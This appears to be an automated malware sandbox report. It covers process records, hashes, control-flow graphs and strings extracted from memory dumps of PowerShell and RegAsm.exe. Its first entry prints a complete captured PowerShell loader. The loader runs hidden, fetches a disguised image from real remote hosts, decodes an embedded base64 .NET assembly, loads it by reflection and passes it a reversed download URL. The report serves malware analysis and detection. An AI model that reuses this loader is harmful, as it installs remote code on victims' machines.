                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:02:15:40
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xfa0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:02:15:59
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe"
                                                                                        Imagebase:0xb0000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:8
                                                                                        Start time:02:16:00
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\SysWOW64\where.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\where.exe"
                                                                                        Imagebase:0x870000
                                                                                        File size:33'280 bytes
                                                                                        MD5 hash:5630411B5F4F453CA575248F7AD4C89F
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        Target ID:10
                                                                                        Start time:02:16:14
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe"
                                                                                        Imagebase:0xb0000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:11
                                                                                        Start time:02:16:26
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x7ff79f9e0000
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2652943426.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848e90000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                          • Instruction ID: 4f6d13a1e641f644b83a0d5b89e1e045fb9419d8f6b4001dfd04de57bab85d14
                                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                          • Instruction Fuzzy Hash: FF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661D736E882CB45

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.5%
                                                                                          Dynamic/Decrypted Code Coverage:4.7%
                                                                                          Signature Coverage:7.4%
                                                                                          Total number of Nodes:149
                                                                                          Total number of Limit Nodes:12

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 91 417d03-417d1f 92 417d27-417d2c 91->92 93 417d22 call 42f943 91->93 94 417d32-417d40 call 42ff43 92->94 95 417d2e-417d31 92->95 93->92 98 417d50-417d61 call 42e3f3 94->98 99 417d42-417d4d call 4301e3 94->99 104 417d63-417d77 LdrLoadDll 98->104 105 417d7a-417d7d 98->105 99->98 104->105
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417D75
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 85fc3f34ef3a3ea4a960e2fe967ebaecc5d053134b9e607797a2ee47c5dc3fad
                                                                                          • Instruction ID: 4f1fda45716572067d10f344df9ac21823cae23fc483b08bda96b3a2ef200833
                                                                                          • Opcode Fuzzy Hash: 85fc3f34ef3a3ea4a960e2fe967ebaecc5d053134b9e607797a2ee47c5dc3fad
                                                                                          • Instruction Fuzzy Hash: 770152B1E0010DA7DF10DBE5EC42FDEB7789F54308F0041A6E90897240F635EB488B95

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 111 42ccc3-42ccff call 404863 call 42dee3 NtClose
                                                                                          APIs
                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCFA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 125 3232b60-3232b6c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 127 3232df0-3232dfc LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 126 3232c70-3232c7c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(356hF-43,00000111,00000000,00000000), ref: 004145EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 356hF-43$356hF-43
                                                                                          • API String ID: 1836367815-652967417

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(356hF-43,00000111,00000000,00000000), ref: 004145EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 356hF-43$356hF-43
                                                                                          • API String ID: 1836367815-652967417

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(356hF-43,00000111,00000000,00000000), ref: 004145EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 356hF-43$356hF-43
                                                                                          • API String ID: 1836367815-652967417

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 59 42d023-42d064 call 404863 call 42dee3 RtlFreeHeap
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042D05F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID: njA
                                                                                          • API String ID: 3298025750-599903507

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 106 42cfd3-42d014 call 404863 call 42dee3 RtlAllocateHeap
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,0041EABE,?,?,00000000,?,0041EABE,?,?,?), ref: 0042D00F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 116 42d073-42d0ac call 404863 call 42dee3 ExitProcess
                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,D09FCD01,?,?,D09FCD01), ref: 0042D0A7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID:
                                                                                          • API String ID: 621844428-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 121 3232c0a-3232c0f 122 3232c11-3232c18 121->122 123 3232c1f-3232c26 LdrInitializeThunk 121->123
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-2160512332
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-3089669407
                                                                                          Strings
                                                                                          • double initialized or corrupted critical section, xrefs: 03265508
                                                                                          • Thread identifier, xrefs: 0326553A
                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 03265543
                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032654CE
                                                                                          • corrupted critical section, xrefs: 032654C2
                                                                                          • Critical section address, xrefs: 03265425, 032654BC, 03265534
                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0326540A, 03265496, 03265519
                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032654E2
                                                                                          • Invalid debug info address of this critical section, xrefs: 032654B6
                                                                                          • Critical section address., xrefs: 03265502
                                                                                          • Address of the debug info found in the active list., xrefs: 032654AE, 032654FA
                                                                                          • undeleted critical section in freed memory, xrefs: 0326542B
                                                                                          • 8, xrefs: 032652E3
                                                                                          • Critical section debug info address, xrefs: 0326541F, 0326552E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                          • API String ID: 0-2368682639
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                          • API String ID: 0-360209818
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                          • API String ID: 0-3591852110
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-3197712848
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                          • API String ID: 0-3532704233
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                          • API String ID: 0-1357697941
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                          • API String ID: 0-3063724069
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                          • API String ID: 0-1700792311
                                                                                          Strings
                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 031ED2C3
                                                                                          • @, xrefs: 031ED313
                                                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 031ED0CF
                                                                                          • @, xrefs: 031ED2AF
                                                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 031ED146
                                                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 031ED196
                                                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 031ED262
                                                                                          • @, xrefs: 031ED0FD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                          • API String ID: 0-1356375266
                                                                                          Strings
                                                                                          • minkernel\ntdll\sxsisol.cpp, xrefs: 03257713, 032578A4
                                                                                          • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03257709
                                                                                          • sxsisol_SearchActCtxForDllName, xrefs: 032576DD
                                                                                          • @, xrefs: 03209EE7
                                                                                          • Internal error check failed, xrefs: 03257718, 032578A9
                                                                                          • Status != STATUS_NOT_FOUND, xrefs: 0325789A
                                                                                          • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 032576EE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                          • API String ID: 0-761764676
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,$.T$VUUU$b$p$r3$r3p,
                                                                                          • API String ID: 0-3151747597
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                          • API String ID: 0-1109411897
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-523794902
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                          • API String ID: 0-4098886588
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-122214566
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-792281065
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                          • API String ID: 0-1745908468
                                                                                          Strings
                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 03262160, 0326219A, 032621BA
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 03262165
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 032621BF
                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0326219F
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03262178
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03262180
                                                                                          Similarity
                                                                                          • API ID:
